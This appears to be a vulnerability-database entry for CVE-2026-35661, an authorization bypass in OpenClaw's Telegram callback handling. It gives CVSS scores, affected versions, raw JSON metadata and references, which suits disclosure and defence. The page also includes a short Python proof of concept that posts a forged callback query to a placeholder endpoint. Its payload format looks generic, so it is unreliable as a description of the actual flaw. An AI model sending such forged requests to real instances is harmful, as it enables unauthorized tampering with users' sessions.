Security Vulnerability Report
中文
CVE-2026-35661 CVSS 5.3 MEDIUM

CVE-2026-35661

Published: 2026-04-10 17:17:08
Last Modified: 2026-04-13 20:32:14
Source: [email protected]

Description

OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in Telegram callback query handling that allows attackers to mutate session state without satisfying normal DM pairing requirements. Remote attackers can exploit weaker callback-only authorization in direct messages to bypass DM pairing and modify session state.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.3.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target simulation endpoint for OpenClaw instance target_url = "http://target-openclaw-instance.com/api/telegram/callback" # Malicious payload simulating a Telegram callback query # This attempts to mutate session state without valid DM pairing payload = { "update_id": 100000000, "callback_query": { "id": "123456789", "from": { "id": 999888777, "is_bot": False, "first_name": "Attacker" }, "message": { "message_id": 100, "from": {"id": 111, "is_bot": True, "first_name": "OpenClawBot"}, "chat": {"id": 999888777, "type": "private"}, "date": 1712000000, "text": "Initial Message" }, # Data field crafted to trigger state mutation "data": "command:mutate_session|param:new_state_value" } } headers = {'Content-Type': 'application/json'} try: response = requests.post(target_url, data=json.dumps(payload), headers=headers) if response.status_code == 200: print("[+] Request sent successfully. Check if session state was mutated.") print("[+] Response:", response.text) else: print("[-] Request failed with status code:", response.status_code) except Exception as e: print("[-] An error occurred:", str(e))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35661", "sourceIdentifier": "[email protected]", "published": "2026-04-10T17:17:07.687", "lastModified": "2026-04-13T20:32:13.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in Telegram callback query handling that allows attackers to mutate session state without satisfying normal DM pairing requirements. Remote attackers can exploit weaker callback-only authorization in direct messages to bypass DM pairing and modify session state."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.25", "matchCriteriaId": "AC9C9003-CE72-4BFC-85B4-1E778E125CB1"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/269282ac69ab6030d5f30d04822668f607f13065", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c9-w69r-cw33", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-telegram-dm-scoped-inline-button-callback-authorization-bypass", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.